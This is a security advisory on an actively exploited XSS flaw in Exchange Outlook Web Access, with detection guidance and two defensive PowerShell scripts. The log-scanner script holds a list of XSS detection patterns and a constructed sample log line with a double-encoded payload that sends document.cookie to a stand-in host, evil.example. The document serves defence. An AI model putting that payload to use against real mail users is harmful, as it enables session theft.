Microsoft Confirms Actively Exploited Zero-Day in Exchange Server (CVE-2026-42897)

Microsoft Exchange Zero-Day Under Active Attack, Mitigations Deployed Automatically

HIGH
May 15, 2026
Vulnerability, Cyberattack

Related Entities

Organizations: Microsoft

Products & Tech: Microsoft Exchange Server; Outlook Web Access (OWA)

CVE Identifiers: CVE-2026-42897 (HIGH, CVSS 8.1)

Full Report

Executive Summary

Microsoft has confirmed that a new high-severity zero-day vulnerability, CVE-2026-42897, is being actively exploited in the wild. The vulnerability is a cross-site scripting (XSS) flaw affecting on-premises versions of Microsoft Exchange Server (2016, 2019, and Subscription Edition) and carries a CVSS score of 8.1. An attacker exploits it by sending a specially crafted email which, when opened in Outlook Web Access (OWA), causes arbitrary script to run in the victim's browser inside the authenticated OWA session. Microsoft has not yet released a full security update but is pushing an automatic mitigation through its Exchange Emergency Mitigation (EM) Service and has published a manual script for servers that cannot reach that service, such as air-gapped systems. Exchange Online is not affected.


Vulnerability Details

The vulnerability, CVE-2026-42897, is classified as improper neutralization of input during web page generation (CWE-79), that is, a cross-site scripting (XSS) vulnerability. It specifically affects Outlook Web Access (OWA), the web-based client for Exchange Server.

The attack vector requires the attacker to send a specially crafted email to the target user. For the exploit to trigger, the user must open the malicious email in OWA and interact with it in a particular way that the report does not specify. When these conditions are met, the attacker's JavaScript executes in the security context of the victim's browser session, which means it runs with the victim's OWA authentication and can call any OWA endpoint the victim can. This can be used to perform actions on behalf of the user, steal session cookies, or conduct network-based spoofing attacks.

Exploitation Status

Microsoft has confirmed that CVE-2026-42897 is being actively exploited in the wild. However, details about the threat actors involved, the scale of the attacks, or the specific post-exploitation activities have not been disclosed. The vulnerability was reported to Microsoft by an anonymous researcher.


Affected Systems

The vulnerability affects the following on-premises Microsoft Exchange Server versions:

  • Microsoft Exchange Server 2016 (Cumulative Update 23)
  • Microsoft Exchange Server 2019 (Cumulative Update 12 and 13)
  • Microsoft Exchange Server Subscription Edition

Important: Microsoft Exchange Online is not affected by this vulnerability.


Impact Assessment

While the CVSS score is 8.1 (High), the impact of a successful exploit can be significant. By executing code in the user's browser, an attacker can:

  • Steal Sensitive Information: Access the user's emails, contacts, and calendar information within the OWA session.
  • Perform Actions on Behalf of the User: Send emails, delete data, or forward sensitive information to an external party.
  • Session Hijacking: Steal session cookies to gain access to the user's OWA account without credentials. If the OWA cookies are marked HttpOnly the script cannot read them directly, but it can still issue authenticated requests from inside the victim's session, so the practical outcome is similar.
  • Pivot to Other Attacks: Use the compromised OWA session as a launchpad for further phishing or social engineering attacks against other employees within the organization.

The requirement for user interaction (opening a specific email in OWA) makes this less severe than a zero-click RCE flaw, but the active exploitation makes it a serious threat for organizations running on-premises Exchange.


Detection Methods

Security teams should focus on identifying vulnerable servers and monitoring for signs of exploitation. The following patterns may help identify vulnerable or compromised systems:

  • Identify Vulnerable Servers: Use the Exchange Health Checker script (HealthChecker.ps1) to verify the build of each Exchange server and confirm whether it is vulnerable.
  • Check Mitigation Status: The Health Checker script also reports whether the automatic mitigation for CVE-2026-42897 has been applied by the EM Service; the mitigation appears in the output when it is active.
  • Monitor Web Logs: Analyze the IIS W3C logs for the Default Web Site (typically C:\inetpub\logs\LogFiles\W3SVC1\) for OWA requests carrying long or heavily encoded strings in URL parameters that are not typical of OWA traffic. Note that IIS logs record the query string but not POST bodies, so a payload submitted in a request body will not appear there; for those, rely on endpoint telemetry.
  • Endpoint Detection: EDR can be configured to alert on suspicious child processes spawned by the w3wp.exe process of the OWA application pool. Keep in mind that this XSS executes in the victim's browser, not on the server, so w3wp.exe telemetry catches follow-on server-side compromise rather than the XSS itself; the victim's workstation and the actions taken through the OWA session (unexpected sends, forwards or rule changes) are where the initial exploitation shows.
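The web-log check above, as an added example that is not code from the article or from Microsoft: it parses IIS W3C log lines for the Default Web Site, keeps only requests under /owa, URL-decodes the query string twice (double encoding is a common way to get past naive filters) and flags entries containing script-like tokens or unusually long queries. The log path, the W3SVC1 site ID and the token list are assumptions; the sample lines are constructed, not real traffic.

```powershell
# Added example, not code from the article or from Microsoft: scan the IIS W3C logs
# of the Default Web Site on an Exchange server for OWA requests whose query string
# carries script-like content. Assumptions: W3SVC1 is the Default Web Site (the IIS
# default), and the log uses the standard W3C '#Fields:' header. IIS logs do not
# record POST bodies, so only payloads carried in the URL are visible here.

$LogDir = 'C:\inetpub\logs\LogFiles\W3SVC1'

# Tokens typical of XSS probes; extend for your environment.
$Patterns = @(
    '<\s*script', 'javascript\s*:', 'on(error|load|mouseover|focus)\s*=',
    'document\.cookie', 'eval\s*\(', 'srcdoc\s*='
)
$Regex = [regex]::new(($Patterns -join '|'), 'IgnoreCase')

function Test-OwaLogLine {
    param([string[]]$Fields, [string]$Line)
    $parts = $Line -split ' '
    if ($parts.Count -ne $Fields.Count) { return $null }   # malformed or truncated line
    $rec = @{}
    for ($i = 0; $i -lt $Fields.Count; $i++) { $rec[$Fields[$i]] = $parts[$i] }
    if ($rec['cs-uri-stem'] -notmatch '^/owa(/|$)') { return $null }

    # Decode twice: double URL-encoding is a common trick against naive filters.
    $q = [System.Uri]::UnescapeDataString([System.Uri]::UnescapeDataString($rec['cs-uri-query']))
    $reasons = @()
    if ($Regex.IsMatch($q))   { $reasons += 'script-like token in query' }
    if ($q.Length -gt 512)    { $reasons += "unusually long query ($($q.Length) chars)" }
    if ($reasons.Count -eq 0) { return $null }

    [pscustomobject]@{
        Time   = "$($rec['date']) $($rec['time'])"
        Client = $rec['c-ip']
        User   = $rec['cs-username']
        Stem   = $rec['cs-uri-stem']
        Reason = $reasons -join '; '
        Query  = $q.Substring(0, [Math]::Min($q.Length, 120))
    }
}

function Get-SuspiciousOwaRequests {
    param([string[]]$Lines)
    $fields = @()
    foreach ($line in $Lines) {
        if ($line.StartsWith('#Fields:')) { $fields = $line.Substring(8).Trim() -split ' '; continue }
        if ($line.StartsWith('#') -or [string]::IsNullOrWhiteSpace($line)) { continue }
        if ($fields.Count -eq 0) { continue }                  # no header seen yet
        $hit = Test-OwaLogLine -Fields $fields -Line $line
        if ($hit) { $hit }
    }
}

# Constructed sample (not real traffic) so the logic can be exercised offline.
# The third line carries a double-encoded <script> payload in the 'url' parameter.
$Sample = @'
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status
2026-05-15 10:01:02 10.0.0.5 GET /owa/ - 443 CONTOSO\alice 10.0.0.20 Mozilla/5.0+(Windows) 200
2026-05-15 10:01:09 10.0.0.5 POST /owa/service.svc action=GetItem 443 CONTOSO\alice 10.0.0.20 Mozilla/5.0+(Windows) 200
2026-05-15 10:02:17 10.0.0.5 GET /owa/ url=%253Cscript%253Edocument.location%253D%2527http%253A%252F%252Fevil.example%252F%253F%2527%252Bdocument.cookie%253C%252Fscript%253E 443 CONTOSO\bob 203.0.113.9 Mozilla/5.0+(Windows) 200
'@ -split "`r?`n"

Get-SuspiciousOwaRequests -Lines $Sample | Format-Table -AutoSize

# Against the live logs, newest file first:
# Get-ChildItem $LogDir -Filter '*.log' | Sort-Object LastWriteTime -Descending |
#     ForEach-Object { Get-SuspiciousOwaRequests -Lines (Get-Content $_.FullName) }
```

On the sample, only the third line is reported (reasons: script-like token in query). Treat hits as leads, not verdicts: legitimate OWA traffic can carry long encoded parameters, so pivot on the client IP and user to see what the session did next.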

Remediation Steps

Since a full security update is not yet available, organizations must rely on the mitigations provided by Microsoft.

  1. Enable and Verify the Exchange Emergency Mitigation (EM) Service:

    • The EM Service ships with Exchange Server 2016 CU22, Exchange Server 2019 CU11 and later, and is enabled by default. It checks Microsoft's Office Config Service hourly for new mitigations and applies them automatically, so each Exchange server needs outbound HTTPS connectivity for it to work.
    • Verification: Run the Exchange Health Checker script (HealthChecker.ps1) to confirm the mitigation is applied. The script is the most reliable way to check the status.
  2. Manual Mitigation for Disconnected Systems:

    • For servers without internet access, or where the EM service cannot run, Microsoft has provided the Exchange On-premises Mitigation Tool (EOMT.ps1).
    • Download the script from Microsoft's official repository and run it on each Exchange server. It applies the same URL Rewrite rule that the EM service deploys, so the IIS URL Rewrite module must be present on the server.
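A quick state check that complements HealthChecker.ps1, as an added example that is not code from the article or from Microsoft. Run from the Exchange Management Shell: it reports whether the EM service is installed and running, whether mitigations are enabled at the organization and server level, which mitigation IDs have been applied or blocked, and lists the URL Rewrite rules on the Default Web Site so the rule named in Microsoft's guidance can be matched. The service name MSExchangeMitigation, the MitigationsEnabled/MitigationsApplied/MitigationsBlocked properties and the rewrite-rule object layout are assumed to be as Microsoft documents them; the mitigation ID for this CVE is deliberately not hard-coded.

```powershell
# Added example, not code from the article or from Microsoft: confirm from the
# Exchange Management Shell that the Emergency Mitigation (EM) Service is active
# and report which mitigation IDs it has applied or blocked on this server.
# Assumptions: the service name MSExchangeMitigation and the MitigationsEnabled /
# MitigationsApplied / MitigationsBlocked properties are as documented by Microsoft
# for the EM Service; the mitigation ID for CVE-2026-42897 is whatever Microsoft's
# guidance names and is not hard-coded here.

function Get-EmMitigationStatus {
    param([string]$Server = $env:COMPUTERNAME)

    $svc = Get-Service -Name MSExchangeMitigation -ErrorAction SilentlyContinue
    $svcStatus = if ($svc) { [string]$svc.Status } else { 'NotInstalled' }
    $org = Get-OrganizationConfig
    $srv = Get-ExchangeServer -Identity $Server

    $status = [pscustomobject]@{
        Server              = $srv.Name
        ServiceStatus       = $svcStatus
        OrgMitigationsOn    = [bool]$org.MitigationsEnabled
        ServerMitigationsOn = [bool]$srv.MitigationsEnabled
        MitigationsApplied  = @($srv.MitigationsApplied) -join ', '
        MitigationsBlocked  = @($srv.MitigationsBlocked) -join ', '
    }

    # A server where EM is disabled, stopped or missing will never receive the
    # automatic rule; it needs the manual EOMT.ps1 path and a HealthChecker re-run.
    if (-not $status.OrgMitigationsOn -or -not $status.ServerMitigationsOn -or $status.ServiceStatus -ne 'Running') {
        Write-Warning "EM Service is not active on $($status.Server); apply the mitigation manually and re-run HealthChecker.ps1."
    }
    $status
}

# The mitigation is an IIS URL Rewrite rule, so listing the rules on the Default
# Web Site shows whether it is present. Compare the names with Microsoft's guidance.
# Assumption: rule objects expose name, match.url and action.type as shown.
function Get-DefaultSiteRewriteRules {
    Import-Module WebAdministration -ErrorAction Stop
    Get-WebConfiguration -Filter '/system.webServer/rewrite/rules/rule' -PSPath 'IIS:\Sites\Default Web Site' |
        Select-Object name,
            @{ Name = 'Pattern'; Expression = { $_.match.url } },
            @{ Name = 'Action';  Expression = { $_.action.type } }
}

Get-EmMitigationStatus | Format-List
Get-DefaultSiteRewriteRules | Format-Table -AutoSize
```

If MitigationsBlocked lists an ID, someone has explicitly excluded that mitigation on the server; that is worth an explanation before assuming the server is covered. On a disconnected server the first function will warn, and the second is the place to confirm that the rule EOMT.ps1 installed is actually present.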

Warning: These mitigations are temporary. Organizations must plan to install the full security update as soon as it is released by Microsoft, as mitigations can sometimes be bypassed by determined attackers.

Timeline of Events

1. May 15, 2026: Microsoft discloses the active exploitation of CVE-2026-42897 and provides mitigation guidance.
2. May 15, 2026: This article was published.

MITRE ATT&CK Mitigations

Apply the official security update from Microsoft as soon as it becomes available. This is the only permanent fix.

The mitigation provided by Microsoft uses URL Rewrite rules to filter and block the malicious requests that trigger the XSS flaw.

Train users to be cautious of unexpected or unusual emails, even from known senders, as user interaction is required to trigger the exploit.

Sources & References

  • Microsoft Warns of Exchange Server Zero-Day Exploited in the Wild, SecurityWeek (securityweek.com), May 15, 2026
  • Microsoft warns of Exchange zero-day flaw exploited in attacks, BleepingComputer (bleepingcomputer.com), May 15, 2026
  • Microsoft Reports Severe Zero-Day Flaw in On-Prem Exchange Servers, Dark Reading (darkreading.com), May 15, 2026

Article Author

Jason Gomes, Cybersecurity Practitioner

Cybersecurity professional with over 10 years of specialized experience in security operations, threat intelligence, incident response, and security automation. Expertise spans SOAR/XSOAR orchestration, threat intelligence platforms, SIEM/UEBA analytics, and building cyber fusion centers. Background includes technical enablement, solution architecture for enterprise and government clients, and implementing security automation workflows across IR, TIP, and SOC use cases.

Areas: Threat Intelligence & Analysis, Security Orchestration (SOAR/XSOAR), Incident Response & Digital Forensics, Security Operations Center (SOC), SIEM & Security Analytics, Cyber Fusion & Threat Sharing, Security Automation & Integration, Managed Detection & Response (MDR)

Tags

CVE-2026-42897, Microsoft Exchange, Zero-Day, XSS, OWA, Microsoft, Cyberattack
